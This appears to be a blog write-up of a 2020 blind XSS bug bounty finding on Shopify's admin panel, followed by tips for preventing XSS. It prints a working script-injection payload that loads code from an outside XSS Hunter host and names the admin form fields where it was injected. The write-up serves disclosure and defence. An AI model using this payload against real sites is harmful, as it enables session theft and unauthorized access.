What is Cross Site Scripting (XSS) ?
Cross Site Scripting (XSS) is a type of cyber attack where an attacker sneaks in harmful code into a web page that other users view. This can lead to the theft of important information like login details, and allow the attacker to carry out unauthorized activities on the targeted website. It’s kind of like a burglar sneaking into a house and planting a hidden camera, giving them access to all the personal information and activities of the homeowners. It’s a serious issue that can cause a lot of harm if not addressed.
The Story of Blind XSS Using XSS Hunter
In 2020, rioncool22, a bug hunter based in North Sumatera, Indonesia, submitted a report to Shopify about a potential vulnerability in their website. He was familiar with the site, as he had conducted multiple bug searches and submitted reports in the past, although with little success.
However, after reading a report about blind cross-site scripting (XSS) from Hacktivity, rioncool22 decided to try the same approach on Shopify’s site using XSS Hunter.
To his surprise, the payload was executed in the admin panel.
Rioncool22 reproduced the vulnerability by going to the “https://your-store.myshopify.com/admin/settings/account” page, adding a staff account, and filling in the first and last name fields with the xss hunter payload “><script>$.getScript(“//xsshunterdomain”)</script>”. The XSS was then fired in the admin panel.
Tips for XSS Vulnerability
Rioncool22 offered a helpful tip for other security researchers searching for XSS bugs:
“Tips: if you’re searching for XSS vulnerabilities, change your payload with the XSS Hunter payload, because you won’t know where the payload will be executed.”
Shopify responded to the report four days later and quickly triaged the issue. Within a week, the vulnerability was resolved and rioncool22 was rewarded with a monetary payout ($$$$). The public disclosure was made on August 19th 2020.
How to Prevent XSS Attack?
To prevent XSS attacks, follow these steps:
- Input validation: Implement strict input validation for all user-generated content, including form fields, search boxes, and message boards. This should include checks to ensure that user input only contains valid characters and is of the expected length.
- Output encoding: Encode all output that includes user-generated content to prevent it from being interpreted as code. This includes data displayed on web pages, as well as data stored in databases and passed between applications.
- Use secure coding practices: Ensure that all code follows secure coding practices, such as avoiding the use of eval(), avoiding inline event handlers, and using parameterized queries when accessing databases.
- Use security-focused browser extensions: Install security-focused browser extensions, such as NoScript, to block scripts from untrusted sources and prevent them from executing on your site.
- Keep software up to date: Keep all software up to date with the latest security patches and upgrades, including your web server software, content management system, and any third-party plugins or extensions.
By implementing these steps, you can help prevent XSS attacks and ensure the security of your website and user data.
Link to write up: here
Save the PDF here